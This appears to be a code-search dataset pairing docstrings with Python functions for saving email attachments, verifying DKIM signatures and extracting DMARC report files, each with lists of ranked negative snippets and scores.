def write_part_to_file(self, uid, part):
filename = part.get_filename()
filename = os.path.join(self.tmp_dir, os.path.basename(filename))
try:
open(filename, 'wb').write(part.get_payload(decode=True))
except Exception as e:
raise Exception(
"Error writing to filename %s with exception %s" %
(filename, str(e)))
else:
self.helper.log_debug(
'write_part_to_file: saved file %s from uid %s' %
(filename, uid))
return filename
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def write(self, message):\r\n os.write(self.wfid, message.encode('utf-8'))",
"def write(message):\n\n with open(str(path), 'a') as fp:\n fp.write(message)",
"def reply_message(self, message):\n\n message = str(message).format(self.path).encode('utf-8')\n self.wfile.write(message)",
"def WriteToFile(msg, file_name):\r\n out_msg = str(msg)\r\n file = open(file_name, \"w\")\r\n file.write(str(decoded_msg))",
"def _writeOutput(self, msg, outputFile):\n f=self.openFile(outputFile, \"a\") #open otuputFile for appending\n f.write (msg)\n f.close()",
"def create_procesed_file(msg, filename, path):\n write_path_txt = os.path.join(path, filename)\n with open(write_path_txt, 'w') as file:\n file.write(str(msg))",
"def writeMessage(self,message):\n pass",
"def write_msg(file_path, msg):\n try:\n fd = open(file_path, 'a+')\n fd.write(msg)\n fd.close()\n except Exception, e:\n debug(e)",
"def write(self, cw, message):\n if cw in self.location:\n fn = self.location[str(cw)]\n try:\n swf = open(fn, \"w\")\n except Exception:\n logmsg.update(\"Error writing to file \" + fn + \"!\", 'E')\n else:\n swf.write(str(message))\n swf.close()\n else:\n logmsg.update(\"Wrong target [\" + str(cw) + \"] for saving file!\", 'E')",
"def _write_message(self, message):\n raw_data = message.serialize()\n debug(\"writing outgoing message of type \" + message.__class__.__name__)\n self.request.sendall(raw_data)",
"def write(self, fname):\n pass",
"def save_to_file(self, fp, sep='\\n'):\r\n n = 0\r\n m = self.read()\r\n while m:\r\n n += 1\r\n fp.write(m.get_body())\r\n if sep:\r\n fp.write(sep)\r\n self.delete_message(m)\r\n m = self.read()\r\n return n",
"def write (self, message, dest):\n raise NotImplementedError( 'Needs implementation' )",
"def printToFile(self, message=''):\n self._outputFile.write(str(message) + '\\n')",
"def write_msg(self, peer, timestamp, msg_type, msg):\n msg_path, msg_file = self.peer_files.get(peer.lower(), (None, None))\n if msg_path:\n msg_seq = self.msg_sequence[peer.lower()]\n\n msg_record = {\n 't': timestamp,\n 'seq': msg_seq,\n 'type': msg_type\n }\n msg_record.update(msg)\n try:\n json.dump(msg_record, msg_file)\n except Exception as e:\n LOG.error(e)\n LOG.info('raw message %s', msg)\n msg_file.write('\\n')\n self.msg_sequence[peer.lower()] += 1\n msg_file.flush()\n os.fsync(msg_file.fileno())",
"def write(self, filename):\n pass",
"def write(self, filename):\n pass",
"def write(self, out, message):\n if out != None:\n out.write(message)",
"def write(self, filename): # real signature unknown; restored from __doc__\n pass",
"def write(self, content):\n ...",
"def write(self, msg, *_):\n if self.out is not None:\n self.out.write(msg)\n self.out.flush()",
"def write_to(self, fp):\n fp.write(self.text)",
"def writeToText(self, textFilePath):\n\n\t\t# Create a text file for write only mode in the current directory\n\t\tfile = open(textFilePath,'w')\n\t\t# Write a message into file \n\t\tfile.write(self.message)\n\t\t# Close file\n\t\tfile.close()\n\t\t# Close the interface\n\t\tself.parent.destroy()",
"def write(self):\n with open(\"log.txt\", 'w') as f:\n for message in self.message_list:\n f.write(message + \"\\n\")",
"def write(self, out):",
"def write (self, file):\n\t\tfile.write (self.pack ())",
"def write_to_file(self, filename: str) -> None:",
"def save_message(self, user, message):\n full_message = '{0} {1} {2}'.format(str(datetime.now()), user, message)\n with open(self.path_to_message_file, 'a') as output:\n output.write(full_message + '\\n')",
"def save_file(self, filename):\r\n \r\n f = open(filename,'w')\r\n f.write(self.body)\r\n f.close",
"def write_file(self):\n if self._write_file == None:\n return\n\n try:\n out = file(self._write_file, \"w\")\n except IOError, e:\n print e\n sys.exit(1)\n out.writelines(\"A cases\") \n out.close()"
] |
[
"0.69103193",
"0.6654209",
"0.6527428",
"0.6521442",
"0.65000355",
"0.64810604",
"0.6317068",
"0.6307852",
"0.62915653",
"0.6230662",
"0.62092286",
"0.6196441",
"0.61899656",
"0.61898386",
"0.61615443",
"0.609231",
"0.609231",
"0.60873765",
"0.6013084",
"0.5990759",
"0.5955906",
"0.5952981",
"0.59521526",
"0.59519124",
"0.58644193",
"0.58585024",
"0.58488035",
"0.58178455",
"0.57794017",
"0.57721716"
] |
0.67170376
|
1
|
Verify DKIM signature(s) from a given RFC822 message Currently only generated debug logging
|
def dkim_verify(self, msg, uid):
try:
obj = dkim.DKIM(msg)
except Exception as e:
self.helper.log_info(
'dkim_verify: exception verifying msg uid %s with %s' %
(uid, str(e)))
else:
sigheaders = [
(x, y) for x, y in obj.headers if x.lower() == b"dkim-signature"]
self.helper.log_debug(
'dkim_verify: msg uid %s has %d DKIM signatures' %
(uid, len(sigheaders)))
for i in range(0, len(sigheaders)):
try:
res = obj.verify(i)
except Exception as e:
self.helper.log_info(
'dkim_verify: exception verifying msg uid %s with %s' %
(uid, str(e)))
else:
if res:
self.helper.log_debug(
'dkim_verify: msg uid %s signature %d ok from domain %s selector %s' %
(uid, i, obj.domain, obj.selector))
else:
self.helper.log_debug(
'dkim_verify: msg uid %s signature %d fail from domain %s selector %s' %
(uid, i, obj.domain, obj.selector))
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def sign_and_verify(self, msg):\n ciphertext, tag = self.signer.encrypt_and_digest(msg.encode('utf-8'))\n plaintext = self.verifier.decrypt(ciphertext)\n try:\n self.verifier.verify(tag)\n print(\"The message is authentic: \", plaintext)\n except ValueError:\n print(\"Key incorrect or message corrupted\")",
"def verify_request_signature(req_info: StatusResponse) -> None:\n if not req_info.signature_check(req_info.xmlstr):\n raise ValueError(_(\"Message signature verification failure\"))",
"def test_signature_verification(self):\n curdir = os.path.dirname(os.path.abspath(__file__))\n keydir = os.path.join(curdir, \"data\", \"ima_keys\")\n\n lines = SIGNATURES.split('\\n')\n\n # empty keyring\n keyring = ima_file_signatures.ImaKeyring()\n self.assertTrue(ima.process_measurement_list(lines, ima_keyring=keyring) is None)\n\n # add key for 1st entry; 1st entry must be verifiable\n rsakeyfile = os.path.join(keydir, \"rsa2048pub.pem\")\n pubkey, keyidv2 = ima_file_signatures.get_pubkey_from_file(rsakeyfile)\n keyring.add_pubkey(pubkey, keyidv2)\n self.assertTrue(ima.process_measurement_list(lines[0:1], ima_keyring=keyring) is not None)\n self.assertTrue(ima.process_measurement_list(lines[1:2], ima_keyring=keyring) is None)\n\n # add key for 2nd entry; 1st & 2nd entries must be verifiable\n eckeyfile = os.path.join(keydir, \"secp256k1.pem\")\n pubkey, keyidv2 = ima_file_signatures.get_pubkey_from_file(eckeyfile)\n keyring.add_pubkey(pubkey, keyidv2)\n self.assertTrue(ima.process_measurement_list(lines[0:2], ima_keyring=keyring) is not None)",
"def verify(self):\n token = \"mytoken\" # set from wx server\n ll = []\n signature = self.get_argument(\"signature\", \"<none>\")\n ll.append(self.get_argument(\"timestamp\", \"<none>\"))\n ll.append(self.get_argument(\"nonce\", \"<none>\"))\n ll.append(token)\n ll.sort()\n m = hashlib.sha1()\n m.update(\"\".join(ll).encode(\"ascii\"))\n digest = m.hexdigest()\n\n if signature != digest:\n print(\"signature not match, discard this msg!\")\n return False\n else:\n print(\"signature match, got a wechat msg!\")\n return True",
"def verify(public_key, message, signature):\n hasher = SHA256.new(message)\n verifier = PKCS1_v1_5.new(public_key)\n return verifier.verify(hasher, signature)",
"def verify(signature: Signature, pub_key: rsa.RSAPublicKey, msg: bytes) -> bool:\n try:\n pub_key.verify(signature, msg, PADDING, HASH)\n except:\n return False\n return True",
"def verify_signature(message: bytes, sender_public_key: RsaKey) -> bytes:\n signature = message[:sender_public_key.size_in_bytes()] # Assume encryption has been done with same key size\n original_message = message[sender_public_key.size_in_bytes():]\n h = SHA256.new(original_message)\n verifier = pkcs1_15.new(sender_public_key)\n try:\n verifier.verify(h, signature)\n return original_message\n except ValueError:\n raise SignatureNotAuthentic",
"def verify_signature(self, message, signature):\n if self.negotiate_flags & \\\n NegotiateFlags.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY:\n actual_checksum = signature[4:12]\n actual_seq_num = struct.unpack(\"<I\", signature[12:16])[0]\n else:\n actual_checksum = signature[8:12]\n actual_seq_num = struct.unpack(\"<I\", signature[12:16])[0]\n\n expected_signature = calc_signature(message, self.negotiate_flags,\n self.incoming_signing_key,\n self.incoming_seq_num,\n self.incoming_handle)\n expected_checksum = expected_signature.checksum\n expected_seq_num = struct.unpack(\"<I\", expected_signature.seq_num)[0]\n\n if actual_checksum != expected_checksum:\n raise Exception(\"The signature checksum does not match, message \"\n \"has been altered\")\n\n if actual_seq_num != expected_seq_num:\n raise Exception(\"The signature sequence number does not match up, \"\n \"message not received in the correct sequence\")\n\n self.incoming_seq_num += 1",
"def verifymessage(self, address, signature, message):\n return self.proxy.verifymessage(address, signature, message)",
"def verify(self, sig, fingerprint):\n\n if type(sig) != type(b''):\n raise ValueError(\"msg should be a byte object!\")\n\n if type(fingerprint) != type('') or len(fingerprint) != 40:\n raise ValueError(\"invalid fingerprint!\")\n\n\n try:\n self.gpg.recv_keys(MIT_KEY_SERVER, fingerprint)\n\n except:\n raise ValueError(\"error when receiving fingerprint {}\".format(fingerprint))\n\n return self.gpg.verify(sig).valid",
"def verifymessage(self, vergeaddress, signature, message):\n return self.proxy.verifymessage(vergeaddress, signature, message)",
"def verify(self, signature, body, external_aad, public_key):",
"def Verify(self, msg, sig):\n try:\n (r, s) = util.ParseDsaSig(sig)\n return self.key.verify(util.Hash(msg), (r, s))\n except errors.KeyczarError:\n # if signature is not in correct format\n return False",
"def verify_rsa(sig_hex, message, public_key):\n sig_int = int(sig_hex , 16)\n m_int = pow(sig_int, public_key.e, public_key.n)\n m_hex = \"%0512x\" % m_int\n h = SHA.new(message).hexdigest()\n return re.match('0001f*' + ASN1_MAGIC + h, m_hex) is not None",
"def salt_sign_and_verify(self, msg, salt):\n ciphertext, tag = self.signer.encrypt_and_digest((msg+salt).encode('utf-8'))\n plaintext = self.verifier.decrypt(ciphertext).replace(salt.encode(), \"\".encode())\n try:\n self.verifier.verify(tag)\n print(\"The message is authentic: \", plaintext)\n except ValueError:\n print(\"Key incorrect or message corrupted\")",
"async def verify_signature(self, message: BasePendingMessage) -> bool:\n\n if message.signature is None:\n LOGGER.warning(\"'%s': missing signature.\", message.item_hash)\n return False\n\n try:\n signature = json.loads(message.signature)\n sigdata = base58.b58decode(signature[\"signature\"])\n public_key = base58.b58decode(signature[\"publicKey\"])\n except ValueError:\n LOGGER.warning(\"Solana signature deserialization error\")\n return False\n\n if signature.get(\"version\", 1) != 1:\n LOGGER.warning(\n \"Unsupported signature version %s\" % signature.get(\"version\")\n )\n return False\n\n if message.sender != signature[\"publicKey\"]:\n LOGGER.warning(\"Solana signature source error\")\n return False\n\n try:\n verify_key = VerifyKey(public_key)\n verification_buffer = get_verification_buffer(message)\n verif = verify_key.verify(verification_buffer, signature=sigdata)\n result = verif == verification_buffer\n except BadSignatureError:\n result = False\n except Exception:\n LOGGER.exception(\"Solana Signature verification error\")\n result = False\n\n return result",
"def notify(plaintext_message, signature):",
"def integrity_digsig_verify(self, signature: bytes, filehash: bytes, filehash_type: str) -> bool:\n fmt = \">BB\"\n if len(signature) < struct.calcsize(fmt):\n logger.warning(\"Malformed signature: not enough bytes\")\n return False\n\n typ, version = struct.unpack(fmt, signature[: struct.calcsize(fmt)])\n if typ not in [EvmImaXattrType.EVM_IMA_XATTR_DIGSIG, EvmImaXattrType.EVM_XATTR_PORTABLE_DIGSIG]:\n logger.warning(\"Malformed signature: wrong type\")\n return False\n\n if version == 2:\n return self._asymmetric_verify(signature, filehash, filehash_type)\n\n logger.warning(\"Malformed signature: wrong version (%d)\", version)\n return False",
"def Verify(self, msg, sig):\n try:\n (r, s) = util.ParseDsaSig(sig)\n return self.key.verify(util.Hash(msg), (r, s))\n except errors.KeyczarError:\n # if signature is not in correct format\n return False",
"def verify(self, assoc_handle, message):\n assoc = self.getAssociation(assoc_handle, dumb=True)\n if not assoc:\n logger.error(\"failed to get assoc with handle %r to verify \"\n \"message %r\" % (assoc_handle, message))\n return False\n\n try:\n valid = assoc.checkMessageSignature(message)\n except ValueError as ex:\n logger.exception(\"Error in verifying %s with %s: %s\" %\n (message, assoc, ex))\n return False\n return valid",
"def validate_signature_using_user_id(message, signature=None):\n if signature is None:\n signature = message.pop('signature')\n\n signature = (int(base64.b64decode(signature).decode()),)\n\n user_id = message['user_id']\n\n message = json.dumps(message)\n public_key_path = os.path.join('public_keys', f'public.{user_id}.key')\n with open(public_key_path, 'rb') as file:\n public_key = RSA.importKey(file.read())\n\n h = SHA.new(message.encode()).digest()\n\n return public_key.verify(h, signature)",
"def validate_signature(message):\n user_validation = UserValidation.validate_user(message['user_id'])\n if user_validation:\n return DataShare.validate_signature_from_message(message, public_key=user_validation), user_validation\n return False, None",
"def verify_signature(self, key, data):\n verify_signature(self, key, data)",
"def Verify(self, signed_bytes, signature_b64):\r\n # Generate the PKCS1-v1_5 compatible message, which includes\r\n # magic ASN.1 bytes and padding:\r\n emsa_msg = self._MakeEmsaMessageSha256(signed_bytes,\r\n self.keypair.size())\r\n\r\n # Get putative signature:\r\n putative_signature = base64.urlsafe_b64decode(signature_b64.encode('utf-8'))\r\n putative_signature = number.bytes_to_long(putative_signature)\r\n\r\n # Verify signature given public key:\r\n return self.keypair.verify(emsa_msg, (putative_signature,))",
"def verify_signature(self):\n if self.get_contact_key:\n sender_key = self.get_contact_key(self.sender_handle)\n else:\n sender_key = fetch_public_key(self.sender_handle)\n if not sender_key:\n raise NoSenderKeyFoundError(\"Could not find a sender contact to retrieve key\")\n MagicEnvelope(doc=self.doc, public_key=sender_key, verify=True)",
"def test_signature_validation(self):\n signature = app.utils.generate_signed_data(\n self._body,\n settings.PRIVATE_KEY\n )\n\n self.assertTrue(app.utils.validate_signed_data(\n self._body,\n signature,\n settings.PUBLIC_KEY\n ))",
"def verifySignature(self, message: bytes, signature: bytes, sigAlgo: SignatureAlgorithm) -> bool:\n\n # Convert parent type algos.SignedDigestAlgorithm to SignatureAlgorithm\n if not isinstance(sigAlgo, SignatureAlgorithm):\n sigAlgo.__class__ = SignatureAlgorithm\n\n # Convert plain ECDSA sig to x9.62 format\n if sigAlgo.isPlain:\n signature = ECDSA_X962_Signature.fromPlain(signature).dump()\n\n hash_algo = algo_utils.get_hash_algo_by_name(sigAlgo.hashAlgo)\n\n class Verifier:\n def __init__(self, vf):\n self._vf = vf\n def verify(self):\n return self._vf()\n\n def get_rsa_verifier(pub_key: rsa.RSAPublicKey):\n if sigAlgo.signature_algo == 'rsassa_pss':\n sig_algo_params = sigAlgo['parameters']\n assert 'mask_gen_algorithm' in sig_algo_params\n assert 'salt_length' in sig_algo_params\n\n mgf = sig_algo_params['mask_gen_algorithm']['algorithm'].native\n if 'mgf1' != mgf:\n raise ValueError(\"Invalid mask generation algorithm: {}\".format(mgf))\n\n mgf1_hash_algo = sig_algo_params['mask_gen_algorithm']['parameters']['algorithm'].native\n mgf1_hash_algo = algo_utils.get_hash_algo_by_name(mgf1_hash_algo)\n return Verifier(lambda:\n pub_key.verify(\n signature,\n message,\n padding.PSS(\n mgf = padding.MGF1(mgf1_hash_algo),\n salt_length = sig_algo_params['salt_length'].native\n ),\n hash_algo\n ))\n else:\n return Verifier(lambda:\n pub_key.verify(signature, message, padding.PKCS1v15(), hash_algo)\n )\n\n def get_ecdsa_verifier(pub_key: ecc.EllipticCurvePublicKey):\n return Verifier(lambda:\n pub_key.verify(signature, message, ecc.ECDSA(hash_algo))\n )\n\n def get_eddsa_verifier(pub_key: ed25519.Ed25519PublicKey):\n return Verifier(lambda:\n pub_key.verify(signature, message)\n )\n\n def get_dsa_verifier(pub_key: ecc.EllipticCurvePublicKey):\n return Verifier(lambda:\n pub_key.verify(signature, message, hash_algo)\n )\n\n # Get signature verifier\n if self.isRsaKey():\n verifier = get_rsa_verifier(self._pub_key)\n elif self.isEcKey():\n verifier = get_ecdsa_verifier(self._pub_key)\n elif self.isEdKey():\n verifier = get_eddsa_verifier(self._pub_key)\n else:\n verifier = get_dsa_verifier(self._pub_key)\n\n # Verify sig\n try:\n verifier.verify()\n except cryptography_exceptions.InvalidSignature:\n return False\n return True",
"def checkvalid(s: bytes, m: bytes, pk: bytes) -> None:\n if len(s) != b // 4:\n raise ValueError(\"signature length is wrong\")\n\n if len(pk) != b // 8:\n raise ValueError(\"public-key length is wrong\")\n\n R = decodepoint(s[: b // 8])\n A = decodepoint(pk)\n S = decodeint(s[b // 8 : b // 4])\n h = Hint(encodepoint(R) + pk + m)\n\n (x1, y1, z1, _) = P = scalarmult_B(S)\n (x2, y2, z2, _) = Q = edwards_add(R, scalarmult(A, h))\n\n if (\n not isoncurve(P)\n or not isoncurve(Q)\n or (x1 * z2 - x2 * z1) % q != 0\n or (y1 * z2 - y2 * z1) % q != 0\n ):\n raise SignatureMismatch(\"signature does not pass verification\")",
"async def verify(self, data, signature):\n\t\tsignature_struct = NTLMSSP_MESSAGE_SIGNATURE.from_bytes(signature)\n\t\tcalc_sig = self.MAC(self.crypthandle_server.encrypt, self.SignKey_server, signature_struct.SeqNum, data)\n\t\t#print('server signature : %s' % signature)\n\t\t#print('calculates signature: %s' % calc_sig)\n\t\treturn signature == calc_sig",
"def verify(self, message, sig):\n\n assert len(message) == 32\n lr, r, ls, s = unpack(\"H32sH32s\", sig)\n sig = Bn.from_binary(r[:lr]), Bn.from_binary(s[:ls])\n return do_ecdsa_verify(self.G, self.pub, sig, message)"
] |
[
"0.6467025",
"0.6031846",
"0.5953838",
"0.5880111",
"0.5860588",
"0.58585465",
"0.5795354",
"0.5677047",
"0.56419563",
"0.5637088",
"0.56293523",
"0.56088346",
"0.5595094",
"0.5575109",
"0.5573037",
"0.55443174",
"0.553801",
"0.55234855",
"0.54802734",
"0.54794645",
"0.5449481",
"0.5429016",
"0.54181343",
"0.5417434",
"0.54164064",
"0.5412086",
"0.54018694",
"0.5390317",
"0.53681004",
"0.5356571"
] |
0.73208284
|
0
|
Find xml, zip and gzip attachments in the response, and write them to disk Return a list of filenames that were written
|
def save_reports_from_message_bodies(self, response):
filelist = []
for uid, data in list(response.items()):
if self.opt_validate_dkim:
self.dkim_verify(data.get(b'RFC822',''), uid)
msg = email.message_from_string(data.get(b'RFC822',''))
if msg.is_multipart():
self.helper.log_debug(
'save_reports_from_message_bodies: start multipart processing of msg uid %s' %
uid)
for part in msg.get_payload():
ctype = part.get_content_type()
if self.check_eligible_mimetype(ctype, uid):
filename = self.write_part_to_file(uid, part)
filelist.append(filename)
else:
self.helper.log_debug(
'save_reports_from_message_bodies: start non-multipart processing of msg uid %s' %
uid)
ctype = msg.get_content_type()
if self.check_eligible_mimetype(ctype, uid):
filename = self.write_part_to_file(uid, msg)
filelist.append(filename)
else:
self.helper.log_debug(
'save_reports_from_message_bodies: skipping content-type %s of msg uid %s' %
(ctype, uid))
# mark msg as seen in KVstore
self.save_check_point(uid.split()[1], msg)
return filelist
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def __get_files(self):\r\n \r\n files = []\r\n with requests.Session() as s:\r\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'}\r\n respons = s.get(self.__url, headers=headers).text\r\n soup = BeautifulSoup(respons, 'html.parser')\r\n data_files = [link.get('href') for link in soup.find_all('a', class_=\"btn-primary\")]\r\n for year in soup.find_all('td', class_=\"align-middle\"):\r\n regex = re.compile(r\"data/data-?gis({year}|\\-rok\\-{year})\\.zip\".format(year=year.text))\r\n if any((match := regex.match(link)) for link in data_files):\r\n files.append(match.group(0))\r\n else:\r\n files.append(data_files[-1])\r\n return files",
"def get_files_to_download(self):\n\n self.logger.logMsg(\"Getting Files to Download\")\n\n download_links = []\n try:\n with open(self.main_xml) as xml_file:\n data_dict = xmltodict.parse(xml_file.read())\n\n xml_file.close()\n\n for docs in data_dict.get('response').get('result').get('doc'):\n for doc in docs.get('str'):\n\n if doc.get('@name') == 'download_link':\n link = doc.get('#text', None)\n if link is not None:\n download_links.append(link)\n except Exception as e:\n self.logger.logMsg(\"Error Getting Files to Download {}\".format(str(e)))\n raise Exception('Error in Getting Files For Download')\n\n self.logger.logMsg(\"Finished Getting Files to Download\")\n\n return download_links",
"def extract_files(self) -> list:\n pass",
"def GetPayloadFiles(self, payloads_name):\n files = set()\n payloads = self.GetPayloadsDict(payloads_name)\n for type_name, payload_dict in payloads.items():\n for part, res_name in payload_dict.items():\n if part == 'file' or re.match(r'part\\d+$', part) or part == 'crx_cache':\n files.add((type_name, part, res_name))\n return files",
"def download_files(self):",
"def files(self):\r\n url = '{0}/files'.format(self.get_url())\r\n\r\n return http.Request('GET', url), parsers.parse_json",
"def get_server_logs(self):\n self.response.content\n binary_body = re.split('--==.*==', self.response.content)[2].split('\\r\\n')[5]\n\n f = StringIO.StringIO()\n f.write(bytearray(binary_body))\n\n memory_zip = ZipFile(f)\n zip_content = {name: memory_zip.read(name) for name in memory_zip.namelist()}\n oracc_log = zip_content['oracc.log']\n request_log = zip_content['request.log']\n\n # Check if server returns a lemmatised file\n autolem = None \n for key, value in zip_content.iteritems():\n if key.endswith(\"autolem.atf\"):\n autolem = value\n\n print zip_content.keys()\n print \"@\"*30\n print oracc_log\n print \"@\"*30\n print request_log\n print \"@\"*30\n if autolem:\n print autolem\n print \"@\"*30\n\n return oracc_log, request_log, autolem",
"def on_get(self, req, resp):\n resp.set_header('Content-Type', 'text/json')\n tif_paths = encode.get_files_in_directory(DIARIES_TO_ENCODE_DIR, \".tif\")\n zip_paths = encode.get_files_in_directory(DIARIES_TO_ENCODE_DIR, \".zip\")\n diaries_paths = tif_paths + zip_paths\n def extract_file_name(path): return os.path.basename(path)\n resp.body = json.dumps({\"diaries\": list(map(extract_file_name, diaries_paths)),\n \"diaries_paths\": diaries_paths})",
"def get_archive(katfilenames):\n\timport requests\n\n\tfile_refs = []\n\tfor filename in katfilenames:\n\t\tif filename.startswith('s3'):\n\t\t\tres = requests.post(S3_URL, headers=S3_HEAD, data='{\"s3_ref\":\"%s\",\"ref_key\":\"Nope\"}'%(filename,))\n\t\t\turl = res.json()['url']\n\t\t\tres1 = requests.get(url)\n\t\t\toutfile = filename.split('/')[-1]\n\t\t\topen(outfile, 'wb').write(res1.content)\n\t\t\tfile_refs.append(outfile)\n\t\telse:\n\t\t\tfile_refs.append(filename)\n\treturn file_refs",
"def __get_raw_content(self, response):\n\n files = response.get('files')\n\n for f in files:\n file_data = files.get(f)\n if file_data.get('truncated'):\n r = requests.get(file_data.get('raw_url'))\n file_data.update({\n 'content': str(r.content, 'utf-8')\n })\n\n return response",
"def download_attachments(output_path, urls):\r\n locations = []\r\n for url in urls:\r\n path = urlparse(url).path\r\n #teardown path and rebuild to negate any errors with\r\n #os.path.join and leading /'s\r\n path = path.split('/')\r\n filename = path.pop(-1)\r\n localpath = ''\r\n for item in path:\r\n localpath = os.path.join(localpath, item)\r\n full_path = os.path.join(output_path, localpath)\r\n if not os.path.exists(full_path):\r\n os.makedirs(full_path)\r\n print('downloading {}'.format(filename))\r\n try:\r\n urlretrieve(url, os.path.join(full_path, filename))\r\n locations.append(os.path.join(localpath, filename))\r\n except URLError as e:\r\n error = (\"No file could be downloaded from {}; Error {}\"\r\n .format(url, e))\r\n logger.warning(error)\r\n except IOError as e: #Python 2.7 throws an IOError rather Than URLError\r\n # For japanese, the error might look kind of like this:\r\n # e = IOError( 'socket error', socket.error(111, u'\\u63a5\\u7d9a\\u3092\\u62d2\\u5426\\u3055\\u308c\\u307e\\u3057\\u305f') )\r\n # and not be suitable to use in \"{}\".format(e) , raising UnicodeDecodeError\r\n # (This is at least the case on my Fedora running Python 2.7.5 \r\n # (default, Feb 19 2014, 13:47:28) [GCC 4.8.2 20131212 (Red Hat 4.8.2-7)] on linux2\r\n try:\r\n error = (\"No file could be downloaded from {}; Error {}\"\r\n .format(url, e))\r\n except UnicodeDecodeError:\r\n # For lack of a better log message because we could not decode e, let's use repr(e)\r\n error = (\"No file could be downloaded from {}; Error {}\"\r\n .format(url, repr(e)))\r\n logger.warning(error)\r\n return locations",
"def get_file_list(compressed_file, PATHstr, client_id):\n\n home = os.getenv(\"HOME\")\n client_path = home + '/client-logs/' + str(client_id) + '/'\n logger.debug('Function Successful: % s',\n 'get_file_list: get_file_list successfully called from process_doc', extra=d)\n\n logger.debug('Calling Function: % s',\n 'get_file_list: get_file_list calling ZipFile', extra=d)\n files = zipfile.ZipFile(compressed_file, \"r\")\n logger.debug('Function Successful: % s',\n 'get_file_list: get_file_list successfully called ZipFile', extra=d)\n\n logger.debug('Calling Function: % s',\n 'get_file_list: get_file_list calling extractall', extra=d)\n files.extractall(PATHstr)\n logger.debug('Function Successful: % s',\n 'get_file_list: get_file_list successfully called extractall', extra=d)\n\n # Create a list of all the files in the directory\n logger.debug('Calling Function: % s',\n 'get_file_list: get_file_list calling listdir', extra=d)\n file_list = os.listdir(PATHstr)\n logger.debug('Function Successful: % s',\n 'get_file_list: get_file_list successfully called listdir', extra=d)\n\n final_list = []\n logger.debug('Loop: %s', 'get_file_list: loop through the files', extra=d)\n for file in file_list:\n if file.startswith(\"doc.\"):\n final_list.append(file)\n elif file.endswith(\".log\"):\n if not os.path.exists(client_path):\n os.makedirs(client_path)\n shutil.copy(PATHstr + file, client_path)\n else:\n shutil.copy(PATHstr + file, client_path)\n logger.debug('Loop successful: %s', 'get_file_list: successfully looped through the files', extra=d)\n\n logger.debug('Returning: %s',\n 'get_file_list: returning list of files', extra=d)\n return final_list, PATHstr",
"def on_post(self, req, resp):\n LOGGER = logging.getLogger()\n \n resp.set_header('Content-Type', 'text/json')\n raw_json = req.stream.read().decode('utf-8')\n content = json.loads(raw_json, encoding='utf-8')\n\n try:\n files = content.get(\"files\")\n zip_name = content.get(\"name\")\n zip_file = DownloadFilesResource.compress_files(files, zip_name)\n resp.body = json.dumps({'file': zip_file})\n LOGGER.info(\"Zip created and ready to download\")\n except Exception as e:\n LOGGER.error(\"Error creating zip file\" , exc_info=True)\n raise falcon.HTTPInternalServerError(title=\"Error downloading files: \" + str(type(e)),\n description=(str(e) +\n ','.join(traceback.format_tb(e.__traceback__))))",
"def attachments(self):\n for part in self.email.walk():\n filename = part.get_filename()\n if filename:\n yield {\n 'type': part.get_content_type(),\n 'name': filename,\n 'content': part.get_payload()\n }",
"def write_zip_content(content, out_path):\n textract_ext = ('.doc', '.docx', '.epub', '.gif', '.htm', '.html', '.odt', '.pdf', '.rtf', '.txt')\n z = zipfile.ZipFile(BytesIO(content))\n unzipped_file_list = z.filelist\n if not unzipped_file_list:\n # if the archive's corrupted, this list is empty\n return\n try:\n z.extractall(out_path)\n except RuntimeError:\n # occurs on password protected archives\n return\n file_list = []\n for f in unzipped_file_list:\n try:\n file_name = f.filename\n if not file_name.endswith('/'):\n file_out_path = os.path.join(out_path, file_name)\n if file_out_path.endswith(textract_ext):\n file_list.append(file_out_path)\n else:\n # capturing as non-machine\n file_list.append(file_out_path)\n except AttributeError:\n pass\n file_list = [os.path.join(out_path, os.path.basename(f)) for f in file_list]\n\n return file_list",
"def web_archive_batch():\n\n try:\n auth_check()\n except Exception as e:\n return flask.redirect(str(e))\n\n batch = set()\n\n if 'archiveFile' in flask.request.files:\n file = flask.request.files['archiveFile']\n if file.filename != '':\n if file and allowed_file(file.filename):\n downloaded = [\n line.decode('utf-8').rstrip('\\n').split(' ')[1]\n for line in file.readlines()\n ]\n archived = db_get_archived()\n\n for video_id in archived:\n if video_id not in downloaded:\n batch.add(video_id)\n else:\n archived = db_get_archived()\n\n for video_id in archived:\n batch.add(video_id)\n\n return flask.Response('\\n'.join(list(batch)),\n mimetype = 'text/plain',\n headers = { 'Content-Disposition': 'attachment;filename=batch.txt' }\n )",
"def download_test_files(request):\n\n # Log the start of the function\n logger.info(\"=========== returns ms1 test files from code directory input/ms1\")\n\n # create an absolute path to the 'example_data_dir' containing the test data files, then create\n # absolute paths to each test data file. Note the test data files are located in this code base.\n example_data_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),'..','..','input/ms1')\n pos_input = os.path.join(example_data_dir, example_pos_filename)\n neg_input = os.path.join(example_data_dir, example_neg_filename)\n tracer_file = os.path.join(example_data_dir, example_tracer_filename)\n run_sequence_pos_file = os.path.join(example_data_dir, example_run_sequence_pos_filename)\n run_sequence_neg_file = os.path.join(example_data_dir, example_run_sequence_neg_filename)\n\n # create filenames\n filename1 = 'ms1_pos_input_test_data.csv'\n filename2 = 'ms1_neg_input_test_data.csv'\n filename3 = 'ms1_tracer_test_data.csv'\n filename4 = 'ms1_run_sequence_pos_test_data.csv'\n filename5 = 'ms1_run_sequence_neg_test_data.csv'\n\n # List of files to be zipped\n files_to_zip = {filename1: pos_input, filename2: neg_input, filename3: tracer_file, filename4: run_sequence_pos_file, filename5: run_sequence_neg_file}\n\n # Create an in-memory zip file\n in_memory_zip = BytesIO()\n with ZipFile(in_memory_zip, 'w', ZIP_DEFLATED) as zipf:\n # Add each file to the zipfile\n for filename in files_to_zip:\n logger.info('filename: {}'.format(filename))\n file_path = files_to_zip[filename]\n with open(file_path, 'rb') as file:\n file_content = file.read()\n zipf.writestr(filename, file_content)\n # The ZipFile object is automatically closed when exiting the 'with' block\n\n zip_filename = \"ms1_test_data_files.zip\"\n # Create an HTTP response with the zip file attached for download\n response = HttpResponse(in_memory_zip.getvalue(),content_type='application/zip')\n 